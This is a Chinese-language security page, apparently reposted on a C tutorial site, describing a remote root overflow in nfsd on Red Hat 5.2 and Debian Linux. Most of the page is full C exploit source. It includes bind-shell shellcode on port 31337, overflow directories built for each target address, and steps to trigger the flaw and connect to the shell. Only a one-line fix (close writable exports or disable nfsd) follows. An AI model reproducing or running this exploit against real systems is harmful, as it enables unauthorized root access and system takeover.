涉及程序:
Debian/Redhat Linux5.2
描述:
Linux的nfsd存在溢出漏洞答应入侵者远程获取root
具体:
假如nfsd服务为开放,并且远程用户拥有一个可写目录,则他可以远程获取root!
以下代码在Linux下编译通过,严禁用于非法用途,否则后果自负!
使用方法参看辰光工作室的 Heavy Security
#include
#include
#include
#include
#include
#include
#define green "E[32m"
#define bold "E[1m"
#define normal "E[m"
#define red "E[31m"
char shell[255] =
"xebx70x31xc9x31xdbx31xc0xb0x46xcdx80x5ex83xc6x0fx89x46"
"x10x89x46x14x89x46x18xb0x02x89x06x89x46x0cxb0x06x89x46"
"x08x31xc0xfexc3x89x5ex04xb0x66x89xf1xcdx80x89x06xb0x30"
"x31xdbx31xc9xb3x0exfexc1xcdx80x66xb8x69x7ax86xc4x66x89"
"x46x0ex8dx46x0cx89x46x04x31xc0xb0x10x89x46x08xb0x66x31"
"xdbxb3x02x89xf1xcdx80x31xc0xfexc0x89x46x04xb0x66xb3x04"
"x89xf1xcdx80xebx04xebx60xebx8cx89x46x0cx8dx46x0cx89x46"
"x04x89x46x08xc6x46x0cx10x31xc0xb0x66x31xdbxb3x05x89xf1"
"xcdx80x83xeex0fx89xc3x31xc9x89x4ex14xb0x3fxcdx80x41xb0"
"x3fxcdx80x41xb0x3fxcdx80xfex06xfex46x04x88x66x07x88x66"
"x0bx89x76x0cx8dx46x09x89x46x10x31xc0xb0x0bx89xf3x8dx4e"
"x0cx8dx56x10xcdx80x31xdbx89xd8xfexc0xcdx80xe8x9bxffxff";
char next[] = "xffx2ex62x69x6ex2ex73x68x41x41x2dx69";
char mark[] = "xffxffxff";
int port = 31337;
int offset;
void usage(char *prog) {
printf("nusage: %s <-e dir> [-t target] [-s port] "
"[-f dir] [-u user] [-p pass]nn",prog);
printf(" -e dir : real-path to exported direectoryn");
printf(" -t target : target OSn ");
printf(" 1 - RH 5.2 (default) n"
" 2 - Debian 2.1n");
printf(" -s port : shell port, default is 31337n");
printf(" -f dir : ftp-path to exported directoryn");
printf(" -u : ftp username (default is ftp)n");
printf(" -p : ftp password (default is ftp@ftp.orgnn");
exit(0);
}
void main(int argc, char **argv) {
int i,j;
int ftp=0;
char user[255]="ftp";
char pass[255]="ftp@ftp.org";
char buf[4096];
char buf2[4096];
char tmp[4096];
char tmp2[4096];
char exp[255] = "!";
char exp2[255]= "!";
char addr[] = "x06xf6xffxffxbf";
while (1) {
i = getopt(argc,argv,"t:e:s:f:u:p:");
if (i == -1) break;
switch (i) {
case 'e': strcpy(exp,optarg); break;
case 's': port = optarg; break;
case 'f': strcpy(exp2,optarg); ftp = 1; break;
case 'u': strcpy(user,optarg); break;
case 'p': strcpy(pass,optarg); break;
case 't': switch (j=atoi(optarg)) {
case 1: strcpy(addr,"x06xf6xffxffxbf");
break; // debian 1.2
case 2: strcpy(addr,"x18xf6xffxffxbf");
break; // rh 5.2
}
default : usage(argv[0]); break;
}
}
if (!strcmp(exp,"!")) usage(argv[0]);
if (ftp == 1) {
// sockets, resolve, connect......
}
*((unsigned short *) (shell + 66)) = port;
offset = strlen(exp);
if (exp[offset-1] != '/') strcat(exp,"/");
offset = strlen(exp);
// 1st directory
bzero(buf,sizeof(buf));
memset(tmp,'A',255);
tmp[255]='/';
tmp[256]='';
strncpy(buf,exp,offset);
// make our dirs
if (ftp == 1) {
printf("USER %sn",user);
printf("PASS %sn",pass);
printf("CWD %sn",exp2);
}
for (i=1;i<=3;i++) {
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck! can't create directory!!! : %dn%sn"normal,i,buf);
exit(-1);
}
} else {
tmp[255]='';
printf("MKD %sn",tmp);
printf("CWD %sn",tmp);
}
}
// offset direcory, length depends on real-path
memset(tmp,'A',255);
tmp[255-offset]='/';
tmp[256-offset]='';
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuqn offset dirW#$#@%#$^%T#n"normal);
exit(-1);
}
} else {
tmp[255-offset]='';
printf("MKD %sn",tmp);
printf("CWD %sn",tmp);
}
// shell directory
memset(tmp,'x',255);
// printf("%dn", strlen(shell));
if (ftp == 1) strncat(shell,mark,strlen(mark));
// printf("%dn", strlen(shell));
strncat(shell,next,strlen(next));
if (ftp == 1) i=3; else i=0;
strcpy(tmp+(255+i-strlen(shell)),shell);
// printf("%dn", strlen(shell));
strncat(buf,tmp,strlen(tmp));
strncat(buf,"/",strlen("/"));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck!@# shell-dirn%sn"normal, buf);
exit(-1);
}
} else {
tmp[258]='';
printf("MKD %sn",tmp);
printf("CWD %sn",tmp);
}
// addr direcotry
memset(tmp,'a',255);
tmp[97] = '';
// *((int*)(tmp+93)) = addr;
// if (ftp != 1) *((int*)(tmp+93)) = 0xbffff606; // debian 2.1
// else {
strcpy(tmp+93,addr);
// }
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck!@#!@#!$ addrez-dir ^n%sn"normal, buf);
exit(-1);
}
} else {
printf("MKD %sn",tmp);
printf("quitn",tmp);
}
fprintf(stderr,normal green"Okn"normal);
fprintf(stderr,"now you have to do: "bold green "rm -rf /path-to-mount-point/A[tab] & n"
"and: telnet target %dnn"normal,port);
}
解决方案:
关闭可写目录,或者干脆关闭nfsd的守护进程。
摘自:永远的 Unix
视频教程列表
文章教程搜索
C语言程序设计推荐教程
C语言程序设计热门教程
|
QQ:2693987339(点击联系)购买教程光盘
:
